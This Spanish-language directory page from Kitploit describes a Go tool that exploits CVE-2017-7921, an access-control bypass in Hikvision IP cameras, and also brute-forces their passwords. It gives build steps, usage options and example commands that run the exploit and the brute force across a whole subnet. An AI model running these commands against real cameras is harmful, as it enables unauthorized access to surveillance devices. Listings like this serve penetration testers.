Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2017-7921-golang — Exploit de omisión de acceso en cámaras IP Hikvision, desarrollado en Golang. | Kitploit
Herramientas/GitHubGitHub/misakamikato/cve-2017-7921-golang
ReconocimientoEscáneres de VulnerabilidadesSeguridad IoTAtaques de ContraseñasExplotaciónExplotación de Aplicaciones Web
GitHubmisakamikato/cve-2017-7921-golang

cve-2017-7921-golang

Exploit de omisión de acceso en cámaras IP Hikvision, desarrollado en Golang.

Ver Repositorio
131hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit de omisión de Hikvision

Requisitos

  1. github.com/levigross/grequests
  2. github.com/msterzhang/gpool
  3. golang.org/x/net
  4. github.com/go-vgo/robotgo

Compilación

root@kitploit:~
git clone https://github.com/MisakaMikato/cve-2017-7921-golang.git
cd cve-2017-7921-golang/src/cve-2017-7921-golang
go build .

Uso

root@kitploit:~
cve-2017-7921 [-e] [-b] [--password password] [-t target] [--thread thread] [-timeout time]

Options:
  -b    Use burte force model
  -e    Use cve-2017-7921 exploit model
  -o string
        Set the output path, if it's empty, the result will be outputed to stdout.
  -password string
        Set the password if using burte force model, or password file path with syntax 'file:<path>' (default "12345")
  -t string
        Exploited target, ip:port or file path, example: 127.0.0.1, or target file path with syntax 'file:<path>'
  -thread int
        The number of concurrent threads (default 1)
  -timeout int
        Give up on target after this long. (default 5)

Press 'w' to get progress info :)

Ejemplo

root@kitploit:~
cve-2017-7921 -e -t 192.168.1.0/24 --thread 10 -o ./res.txt
cve-2017-7921 -b --password file:./pwds.txt -t 192.168.1.0/24 --thread 10
Descargar herramienta